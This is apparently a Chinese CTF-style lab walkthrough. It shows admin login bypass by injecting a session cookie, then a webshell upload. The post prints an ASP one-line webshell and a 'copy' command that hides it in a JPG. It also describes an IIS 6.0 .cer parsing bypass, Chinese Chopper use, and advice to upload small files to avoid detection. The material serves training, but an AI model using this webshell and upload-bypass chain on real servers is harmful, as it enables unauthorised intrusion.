SQL注入篇:SQL 注入靶场练习【实例5】


当你的才华

还撑不起你的野心时

那你就应该静下心来学习


 

SQL 注入靶场练习【实例5】

     【实例5】靶场传送门:http://59.63.200.79:8005/admin/Login.asp

      大家如果像为了更好的效果,可以自己再虚拟机里搭一个asp靶场,这里我网上找一个ASP/Access搭建源码,地址如下:

      http://www.mycodes.net/26/956.htm

文章整理思路:

      1、通过修改Cookie登录后台

      2、上传WebShell

      3.上传图片时建议上传小文件(尽量避免被发现),工具的话,我使用的是菜刀,但建议使用蚁剑

      打开F12查看cookie

SQL注入篇:SQL 注入靶场练习【实例5】_第1张图片

这是刚刚获取的cookie

SQL注入篇:SQL 注入靶场练习【实例5】_第2张图片

新添加Cookie

ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC

SQL注入篇:SQL 注入靶场练习【实例5】_第3张图片

成功新增一行刚刚获取的cookie名称和值

SQL注入篇:SQL 注入靶场练习【实例5】_第4张图片

或通过EditThisCookie插件来改

SQL注入篇:SQL 注入靶场练习【实例5】_第5张图片

成功新增cookie后,尝试看看还需不需要密码才能登陆后台,我们访问http://59.63.200.79:8005/admin/default.asp

SQL注入篇:SQL 注入靶场练习【实例5】_第6张图片

成功绕过登陆验证,查看到相关后台信息

SQL注入篇:SQL 注入靶场练习【实例5】_第7张图片

制作ASP一句话木马:<%eval request ("pass")%> 密码是pass eval是个函数,request是接受参数的。

.asp 木马容易被查杀拦截,我们使用cmd 命令行创建图片马

copy danshengou.jpg/a + ce.asp/b ce.jpg

SQL注入篇:SQL 注入靶场练习【实例5】_第8张图片

SQL注入篇:SQL 注入靶场练习【实例5】_第9张图片

找到有上传点的地方,上传一张图片马

SQL注入篇:SQL 注入靶场练习【实例5】_第10张图片

可以看到已修改成功

SQL注入篇:SQL 注入靶场练习【实例5】_第11张图片

去上传文件管理,看看我们有没有成功上传文件

SQL注入篇:SQL 注入靶场练习【实例5】_第12张图片

我不知道怎么回事,提示长传成功,但去上传管理那里查看,就是JB没显示我刚刚上传成功的文件,不管了,就是一个思路,这里,直接截其它地方的图做演示。

连接刚刚上传的.jpg图片马

SQL注入篇:SQL 注入靶场练习【实例5】_第13张图片

      然后我们双击去访问,报了一个405报错。这是因为jpg文件不解析,因为你的后缀是图片格式,所以服务器会当做一张图片去读取,而不是代码。

      就和你把一个图片后缀改为TXT然后打开里面的东西都会当文本读取而不是图片。报错信息里面写了iis6.0的中间件。百度下iis6.0的解析漏洞,就能发现上传cer文件,iis6.0会解且执行。,然后把图片马名字改为cer上传,成功上传,然后菜刀连接,成功进入,然后滚轮划一下就能看到flag!.txt,然后双击打开就是flag了。

SQL注入篇:SQL 注入靶场练习【实例5】_第14张图片

 


我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重


 

你可能感兴趣的:(渗透测试,SQL,注入靶场实例,SQL注入)